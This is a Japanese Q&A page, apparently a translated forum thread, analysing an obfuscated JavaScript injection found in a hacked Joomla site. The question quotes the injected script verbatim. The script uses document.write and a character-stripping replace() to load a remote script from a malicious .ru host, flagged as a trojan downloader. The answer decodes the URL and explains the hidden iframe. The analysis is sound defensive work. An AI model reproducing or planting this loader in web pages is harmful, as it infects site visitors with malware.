1. ホーム
  2. javascript

[解決済み] このサイト感染スクリプトはどのように機能するのですか?

2022-12-02 03:55:59

質問

私のJoomla!ウェブサイトは繰り返しハッキングされています。誰かが、どういうわけか、主要な php スクリプトに以下のようなゴミを注入することに成功しましたが、私は Joomla の設定について話すつもりはありません。このサイトはあまり訪問されないので(そのサイトの訪問者は私一人かもしれないと危惧するときもある...)、サイトを復旧させることはあまり気にしていない。最終的には私が処理します。

私の質問は、このゴミはどのように動作するのでしょうか?私はそれを見て、これがどのように害を及ぼすように管理されているのかがわかりません。これはトロイの木馬に感染しており、開いた後、Acrobat をフリーズさせ、マシンに大混乱を引き起こします。どうやってそんなことをするのか、私にはわからないし、興味もない。しかし、次のスクリプトはどのようにしてダウンロードを呼び出すのでしょうか?

<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->

ESET はこのコードを JS/TrojanDownloader.Agent.NRO トロイの木馬です。

どのように解決するのですか?

このとき replace の呼び出しに注目してください。 .replace(/#|\$|@|\^|&|\(|\)|\!/ig, '') .

特殊文字のほとんどを削除し、通常のURLにします。

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(私は手動で http:evil: )

正規表現は次のように簡略化できます。 .replace(/[#$@^&()!]/ig, '')

スクリプトを見ると、これは非常にシンプルなスクリプトで、パスを含む隠された IFRAME を注入します。 /index.php?ys を含む隠しIFRAMEを同じドメインから注入しています。

Fiddlerでそのページをリクエストしてみましたが、コンテンツがありませんでした。